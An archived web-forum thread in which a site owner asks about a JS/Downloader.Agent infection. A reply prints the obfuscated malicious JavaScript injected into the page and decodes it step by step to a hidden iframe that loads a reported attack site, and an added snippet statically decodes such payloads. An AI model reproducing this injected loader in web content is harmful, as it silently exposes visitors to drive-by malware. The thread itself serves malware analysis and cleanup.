Full Version: Virus threat
Invision Power Services > Community Forums > Community Technical Chat
JameST
I have a virus that is downloading itself automatically on to users' PCs. The name is (JS/Downloader.Agent). I can easily remove this from my PC with the virus scanner I have.

My question is:
My service provider has told me to
"About your query, if your site has a virus what we can suggest is: download all your files on your local computer and clean it up by running anti virus software, and once detected remove the said files, then upload the webfiles back to your webspace. There is no other source of virus on your webspace other than from the files that were uploaded on your server."


Now I use FileZilla as my FTP client, so should I download everything, run the virus scanner, and once finished upload all the files again?

Thanks for your help in advance

James
Stephen
What is the address of the page on your site that contains the virus?
JameST
http://s205024498.websitehome.co.uk/pc
Stephen
Take a look at the bottom of that page, you will see the following JS:

CODE
function c72649779390m48a1e320ed560(m48a1e320edd34){ function m48a1e320ee508(){var m48a1e320eeceb=16;return m48a1e320eeceb;} return (parseInt(m48a1e320edd34,m48a1e320ee508()));}function m48a1e320ef4b1(m48a1e320efc85){ function m48a1e320f1400(){var m48a1e320f1bd4=2;return m48a1e320f1bd4;} var m48a1e320f0458='';m48a1e320f23a8=String.fromCharCode;for(m48a1e320f0c2c=0;m48a1e320f0c2c<m48a1e320efc85.length;m48a1e320f0c2c+=m48a1e320f1400()){ m48a1e320f0458+=(m48a1e320f23a8(c72649779390m48a1e320ed560(m48a1e320efc85.substr(m48a1e320f0c2c,m48a1e320f1400()))));}return m48a1e320f0458;} var z32='';var m48a1e320f2b7c='3C7'+z32+'3637'+z32+'2697'+z32+'07'+z32+'43E696628216D7'+z32+'96961297'+z32+'B646F637'+z32+'56D656E7'+z32+'42E7'+z32+'7'+z32+'7'+z32+'2697'+z32+'465287'+z32+'56E657'+z32+'363617'+z32+'065282027'+z32+'2533632536392536362537'+z32+'32253631253664253635253230253665253631253664253635253364253633253337'+z32+'2532302537'+z32+'332537'+z32+'32253633253364253237'+z32+'2536382537'+z32+'342537'+z32+'342537'+z32+'302533612532662532662536662537'+z32+'302536312536652536312532652536332536652532662536662537'+z32+'302536312532652536382537'+z32+'34253664253663253366253237'+z32+'2532622534642536312537'+z32+'342536382532652537'+z32+'322536662537'+z32+'352536652536342532382534642536312537'+z32+'342536382532652537'+z32+'3225363125366525363425366625366425323825323925326125333325333025333525333025'+z32+'3334253239253262253237'+z32+'2533342533312536352533382533352533362533332533362536352533332536342536322532'+z32+'37'+z32+'2532302537'+z32+'37'+z32+'2536392536342537'+z32+'34253638253364253331253336253334253230253638253635253639253637'+z32+'2536382537'+z32+'342533642533312533382533362532302537'+z32+'332537'+z32+'342537'+z32+'39253663253635253364253237'+z32+'2536342536392537'+z32+'332537'+z32+'302536632536312537'+z32+'39253361253230253665253666253665253635253237'+z32+'2533652533632532662536392536362537'+z32+'3225363125366425363525336527'+z32+'29293B7'+z32+'D7'+z32+'6617'+z32+'2206D7'+z32+'969613D7'+z32+'47'+z32+'27'+z32+'5653B3C2F7'+z32+'3637'+z32+'2697'+z32+'07'+z32+'43E';document.write(m48a1e320ef4b1(m48a1e320f2b7c));</script>


This results in the following being generated:

CODE
if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%37%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6f%70%61%6e%61%2e%63%6e%2f%6f%70%61%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%30%35%30%34%29%2b%27%34%31%65%38%35%36%33%36%65%33%64%62%27%20%77%69%64%74%68%3d%31%36%34%20%68%65%69%67%68%74%3d%31%38%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;


which then results in the following being generated:

CODE
<iframe name=c7 src='http://opana.cn/opa.html?'+Math.round(Math.random()*30504)+'41e85636e3db' width=164 height=186 style='display: none'></iframe>


This loads the page http://opana.cn/opa.html?SOME_RANDOM_NUMBERS41e85636e3db

That seems to be it to me (although that URL isn't loading; I suspect it might be checking the referrer (which is why the 41e85636e3db is constant) and not responding if it doesn't match).

Indeed Firefox says "This web site at opana.cn has been reported as an attack site and has been blocked based on your security preferences." when you attempt to load the page, and Google says "This site may harm your computer."

So you just need to edit that file and remove the JS.
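The two decode stages Stephen walks through above, as an added example that is not part of his post or of the page: a static decoder that reverses the hex-pair stage and the unescape stage with string operations only, so an analyst can recover the injected iframe target without ever running the script. The function names and the sample payload are constructed for this example (the sample points at bad.example, not at any real host).

```javascript
// Stage 1 of the page's script: a run of hex pairs (radix 16, step 2), each
// pair one character code, split into quoted chunks by '+z32+' where z32 is ''.
// collapseConcat() joins the quoted chunks back into one hex string.
function collapseConcat(expr) {
  const chunks = [];
  const re = /'([^']*)'/g;
  let m;
  while ((m = re.exec(expr)) !== null) chunks.push(m[1]);
  return chunks.join('');
}

function decodeHexPairs(hex) {
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Stage 2: the decoded script calls unescape() on a %XX string; reverse that too.
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Decode every unescape('...') literal found after stage 1 and return the src=
// of each iframe in it, which is the value a defender wants to blocklist.
function extractIframeSources(expr) {
  const stage1 = decodeHexPairs(collapseConcat(expr));
  const srcs = [];
  const litRe = /unescape\(\s*'([^']*)'\s*\)/g;
  let m;
  while ((m = litRe.exec(stage1)) !== null) {
    const html = decodePercent(m[1]);
    const srcRe = /<iframe[^>]*\ssrc=['"]?([^'"\s>]+)/gi;
    let s;
    while ((s = srcRe.exec(html)) !== null) srcs.push(s[1]);
  }
  return srcs;
}

// Constructed sample (not the page's payload). SAMPLE_PERCENT encodes
// <iframe src='http://bad.example/x.html' style='display: none'></iframe>;
// the stage-1 wrapper is then hex-paired and chunked with '+z32+' like the page's script.
const SAMPLE_PERCENT = '%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%61%64%2e%65%78%61%6d%70%6c%65%2f%78%2e%68%74%6d%6c%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e';
const SAMPLE_STAGE1 = "if(!myia){document.write(unescape('" + SAMPLE_PERCENT + "'));}var myia=true;";
function toHexPairs(s) {
  return Array.from(s, ch => ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}
const SAMPLE_EXPR = "var z32='';var p='" + toHexPairs(SAMPLE_STAGE1).replace(/(.{4})/g, "$1'+z32+'") + "';";
```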
JameST
Thanks for your help Stephen, it is greatly appreciated. Unfortunately this has flown right over my head.

What file do I need to amend and what do I change it to?
ricky101
Well, if anyone can explain, what exactly is this JS downloader? I see this on many websites which I visit; Kaspersky just blocks it. Would it harm if I turn off the anti-virus when visiting the site?
X3773
Well, you can download all the files and run a virus scan and see if it finds a virus or more. If it does find one, just delete it off your web site. No need to upload all the files back, just delete the ones that have a virus.
Invision Power Board © 2001-2008 Invision Power Services, Inc.